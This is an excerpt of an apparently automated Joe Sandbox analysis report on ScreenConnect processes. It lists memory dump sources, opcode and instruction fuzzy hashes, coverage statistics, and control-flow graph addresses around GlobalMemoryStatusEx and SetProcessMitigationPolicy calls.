                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 99e1b55ef49d57953a21ea9639d65d82b986e8a21cda4c1302cace655ab74661
                                                                      • Instruction ID: 05f4da51b6bd52b04be521b2daccac435bb453d7de78ce18989f466ba2852712
                                                                      • Opcode Fuzzy Hash: 99e1b55ef49d57953a21ea9639d65d82b986e8a21cda4c1302cace655ab74661
                                                                      • Instruction Fuzzy Hash: CF11B772E0DE5CCFEF94DB9848A16B93BA2EF55B04F0600ABD46CC72A6DA307545C705
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 01f87ae88105b100ce5cd94d417b5d275a3b88e4e860463772bb906e5ddd5f56
                                                                      • Instruction ID: d591335a8db8ea556513779b26f373051895a23c354255fcd04fbde13c4ada46
                                                                      • Opcode Fuzzy Hash: 01f87ae88105b100ce5cd94d417b5d275a3b88e4e860463772bb906e5ddd5f56
                                                                      • Instruction Fuzzy Hash: 96F04E22B29D0E0BEB98EB6C40646F662C1FF9821076045B5D82DC71EADC24E4428340
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4884f4fe98e064d5e056760b7c2bf9d24a597d541b22537e33027c81ba3411a6
                                                                      • Instruction ID: e79db55658b2a727cf0c1d3ab6522218dc28cb60b7c341c4008edac0782a9ce9
                                                                      • Opcode Fuzzy Hash: 4884f4fe98e064d5e056760b7c2bf9d24a597d541b22537e33027c81ba3411a6
                                                                      • Instruction Fuzzy Hash: 9EF0826250E7C44FE3169B359869C507FB1DE1322030E41DFD4C5CF0B3E5189949C761
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eee5678256fb21a327a31187e56bff516edfef1076be0378e8a51d70aedfcc02
                                                                      • Instruction ID: cb7a32b3dcbfdcd4560b10b4e42aa2d282a9aa507ac5a91f6d70d3ed8cfd8abf
                                                                      • Opcode Fuzzy Hash: eee5678256fb21a327a31187e56bff516edfef1076be0378e8a51d70aedfcc02
                                                                      • Instruction Fuzzy Hash: AEE04F11B38D490B9B88B7ACA0A15F962C2EF9822075042F6D82EC32DEDD6895428240

                                                                      Execution Graph

                                                                      Execution Coverage:12.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:10
                                                                      Total number of Limit Nodes:2
                                                                      execution_graph 13923 7ffd9b63491d 13924 7ffd9b63492f 13923->13924 13925 7ffd9b634ad9 GlobalMemoryStatusEx 13924->13925 13927 7ffd9b634a32 13924->13927 13926 7ffd9b634b05 13925->13926 13928 7ffd9b337e84 13930 7ffd9b337e8d 13928->13930 13929 7ffd9b337ef2 13930->13929 13931 7ffd9b337f66 SetProcessMitigationPolicy 13930->13931 13932 7ffd9b337fc2 13931->13932

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 533 7ffd9b63491d-7ffd9b6349aa 540 7ffd9b6349f4-7ffd9b634a07 533->540 541 7ffd9b6349ac-7ffd9b6349d5 533->541 548 7ffd9b634a78-7ffd9b634a8c 540->548 549 7ffd9b634a09-7ffd9b634a0d 540->549 542 7ffd9b634a2e 541->542 543 7ffd9b6349d7-7ffd9b6349da 541->543 547 7ffd9b634a2f 542->547 545 7ffd9b634a5b-7ffd9b634a5f 543->545 546 7ffd9b6349dc-7ffd9b6349de 543->546 567 7ffd9b634a60 545->567 550 7ffd9b6349e0 546->550 551 7ffd9b634a5a 546->551 552 7ffd9b634a30 547->552 553 7ffd9b634aab-7ffd9b634ab0 547->553 562 7ffd9b634a8d 548->562 555 7ffd9b634a0f-7ffd9b634a11 549->555 556 7ffd9b634a8e-7ffd9b634a8f 549->556 558 7ffd9b634a23 550->558 559 7ffd9b6349e2-7ffd9b6349e4 550->559 551->545 560 7ffd9b634ab1-7ffd9b634ad7 552->560 561 7ffd9b634a31 552->561 553->560 555->562 563 7ffd9b634a13-7ffd9b634a17 555->563 564 7ffd9b634a90-7ffd9b634a91 556->564 565 7ffd9b634ad9-7ffd9b634b03 GlobalMemoryStatusEx 556->565 568 7ffd9b634a9f-7ffd9b634aa3 558->568 569 7ffd9b634a25 558->569 559->567 570 7ffd9b6349e6 559->570 560->565 574 7ffd9b634a73-7ffd9b634a77 561->574 575 7ffd9b634a32-7ffd9b634a59 561->575 562->556 566 7ffd9b634a93-7ffd9b634a98 563->566 576 7ffd9b634a19 563->576 564->566 572 7ffd9b634b05 565->572 573 7ffd9b634b0b-7ffd9b634b32 565->573 578 7ffd9b634a99-7ffd9b634a9e 566->578 579 7ffd9b634aa5-7ffd9b634aaa 568->579 580 7ffd9b634a67-7ffd9b634a69 569->580 581 7ffd9b634a26-7ffd9b634a27 569->581 582 7ffd9b6349e8-7ffd9b6349ea 570->582 583 7ffd9b634a29 570->583 572->573 574->548 575->551 576->545 577 7ffd9b634a1b-7ffd9b634a1d 576->577 577->578 584 7ffd9b634a1f-7ffd9b634a21 577->584 578->568 579->553 585 7ffd9b634a6f 580->585 586 7ffd9b634a6b-7ffd9b634a6e 580->586 581->583 588 7ffd9b634a66 582->588 589 7ffd9b6349ec 582->589 583->579 587 7ffd9b634a2b-7ffd9b634a2d 583->587 584->558 591 7ffd9b634a71 585->591 592 7ffd9b634a72 585->592 586->585 587->542 588->580 589->547 593 7ffd9b6349ee-7ffd9b6349f2 589->593 591->592 592->574 593->540
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1825081742.00007FFD9B630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B630000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffd9b630000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: ac76a5818877fcfc272b887067b7d273982ea6b51fc7754ffa691a51db52b352
                                                                      • Instruction ID: 8ec68fa67a11185c379f1466f073d1dc46419691a8b31172c7032c79b22585a4
                                                                      • Opcode Fuzzy Hash: ac76a5818877fcfc272b887067b7d273982ea6b51fc7754ffa691a51db52b352
                                                                      • Instruction Fuzzy Hash: 51913932A0F68D4FEB75C7A988255A9BFE0EF52311F0541BFC06DCB4A7DA182909C741

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1820784781.00007FFD9B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B330000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffd9b330000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: MitigationPolicyProcess
                                                                      • String ID:
                                                                      • API String ID: 1088084561-0
                                                                      • Opcode ID: 49a2e6865dfbc4d04c638e20eb96a77d8683ea886c8efb932c9f2f0f75c2b141
                                                                      • Instruction ID: e40fcee4f1d24ea4f753d38c0f51884c89de47b234b11edebad6968b88c36770
                                                                      • Opcode Fuzzy Hash: 49a2e6865dfbc4d04c638e20eb96a77d8683ea886c8efb932c9f2f0f75c2b141
                                                                      • Instruction Fuzzy Hash: 8B516C31E1DB498FD728EFA89C465F97BE0EF55310F0401BFE049C31A2DE68A8468791